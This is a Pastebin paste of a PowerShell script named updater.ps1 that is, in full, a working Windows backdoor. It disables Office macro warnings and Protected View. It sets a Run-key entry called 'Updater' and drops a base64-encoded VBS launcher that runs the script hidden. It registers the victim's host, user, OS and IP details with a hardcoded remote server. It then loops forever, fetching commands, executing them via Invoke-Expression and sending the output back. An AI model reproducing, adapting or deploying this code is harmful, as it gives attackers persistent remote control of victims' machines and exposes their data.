SHARE
TWEET

updater.ps1

opexxx Mar 9th, 2017 (edited) 265 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $Excel = New-Object -ComObject Excel.Application
  2. $ExcelVersion = $Excel.Version
  3. for($i=10; $i -le 20; $i++){
  4. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force
  5. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force
  6. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
  7. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
  8. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
  9. }
  10. for($i=10; $i -le 20; $i++){
  11. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force
  12. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name VBAWarnings -Value 1 -PropertyType DWORD -Force
  13. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
  14. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
  15. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
  16. }
  17. New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name Updater -PropertyType String -Value 'C:\Users\Public\Documents\conf.vbs' -Force
  18. $x='RGltIG9ialNoZWxsClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikKY29tbWFuZCA9ICJwb3dlcnNoZWxsLmV4ZSAtV2luZG93U3R5bGUgaGlkZGVuIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1ub2xvZ28gLW5vcHJvZmlsZSAtZmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXFVwZGF0ZXIucHMxIgpvYmpTaGVsbC5SdW4gY29tbWFuZCwwClNldCBvYmpTaGVsbCA9IE5vdGhpbmcK'
  19. [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($x)) | Out-File C:\Users\Public\Documents\conf.vbs
  20.  
  21. $config = @{'api'= 'http://138.201.75.227/v2/'; 'storagePath'= 'C:\Users\Public\Documents'; 'chunkSize'=1024; 'retryCount'=2}
  22. function encode
  23. {
  24.     param([string] $text)
  25.     $bytes = [System.Text.Encoding]::UTF8.GetBytes($text)
  26.     [Convert]::ToBase64String($bytes)
  27. }
  28.  
  29. function decode
  30. {
  31.     param([string] $code)
  32.     [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code))
  33. }
  34.  
  35.  
  36. function getIps
  37. {
  38.     $ips=""
  39.     gwmi Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | where{$_.IPAddress[0] -NotLike '169*'} | % {$ips = $ips + "-"+ $_.IPAddress[0]}
  40.     return $ips.subString(1)
  41. }
  42.  
  43. function eval
  44. {
  45.     param([string] $expression)
  46.     try {
  47.         Invoke-Expression $expression
  48.     } catch [System.SystemException] {
  49.         return $false
  50.     }
  51. }
  52.  
  53. function httpGet
  54. {
  55.     param([string] $url)
  56.     try {
  57.         return (New-Object System.Net.WebClient).DownloadString("$($config['api'])$($url)")
  58.     }
  59.     catch [Net.WebException] {
  60.         return $_.Exception.Message
  61.     }
  62. }
  63.  
  64. function sendResult
  65. {
  66.     param([string] $key, [string] $cmdId, [string]$result)
  67.     $prefix = "?action=saveResult&id=$key&cmd=$cmdId"
  68.     $chunks = [math]::floor($result.Length / $config['chunkSize'])
  69.     if($chunks -eq 0){
  70.         httpGet "$prefix&res=$result"
  71.     }else{
  72.         $counter = 0;
  73.         for($j=0; $j -le $chunks; ++$j){
  74.             $httpResult=''
  75.             if($j -eq $chunks){
  76.                 $chunk = $result.Substring($j*$config['chunkSize'])
  77.                 $httpResult = httpGet "$prefix&chunk=last&res=$chunk"
  78.             }else{
  79.                 $chunk = $result.Substring($j*$config['chunkSize'],$config['chunkSize'])
  80.                 $httpResult = httpGet "$prefix&chunk=$j&res=$chunk"
  81.             }
  82.             if($httpResult -eq 'OK'){continue}
  83.             ++$counter
  84.             --$j
  85.             if($counter -ge $config['retryCount']){break}
  86.             Start-Sleep -s 5
  87.         }
  88.     }
  89. }
  90.  
  91. function getKey
  92. {
  93.     $keyPath = "$($config['storagePath'])\$($env:username).key"
  94.     if((Test-Path $keyPath) -eq $true){
  95.         $key = Get-Content $keyPath
  96.         if($key -match "^\d+$"){
  97.             return $key
  98.         }
  99.     }
  100.     $os = (Get-WmiObject Win32_OperatingSystem).Name
  101.     $os = $os.Split('{|}', [System.StringSplitOptions]::RemoveEmptyEntries)
  102.     $os ="$((Get-WmiObject Win32_OperatingSystem).OSArchitecture)|$((Get-WmiObject Win32_OperatingSystem).Version)|$($os[0])|$($os[1])"
  103.     $data = "$($env:computername)::$($env:username)::$($os)::$(getIPs)"
  104.     $data = encode $data
  105.     $id = httpGet "?action=register&data=$($data)"
  106.     if($id.Length -gt 0){
  107.         if($id -match "^\d+$"){
  108.             Set-Content $keyPath $id
  109.             return $id
  110.         }
  111.     }
  112.     return $false
  113. }
  114.  
  115. function getCommand($key)
  116. {
  117.     $commands = httpGet -url "?action=getCommand&id=$key"
  118.     if($commands.Length -gt 4){
  119.         $parts = $commands.Split('{::}', [System.StringSplitOptions]::RemoveEmptyEntries)
  120.         $id = $parts[0]
  121.         $cmd = decode $parts[1]
  122.         $res = ((eval $cmd) | Out-String)
  123.         $res = $res -replace ' {4,}', '    '
  124.         $res = $res -replace '\-{4,}', '----'
  125.         $res = encode $res
  126.         sendResult $key $id $res
  127.         return $true
  128.     }
  129.     return $false
  130. }
  131.  
  132.  
  133. while($true){
  134. $key = getKey
  135. if($key -eq $false){start-sleep -Seconds 120}
  136. else{break}
  137. }
  138. while ($true){
  139.     getCommand $key
  140.     start-sleep -Seconds 120
  141. }
RAW Paste Data
Top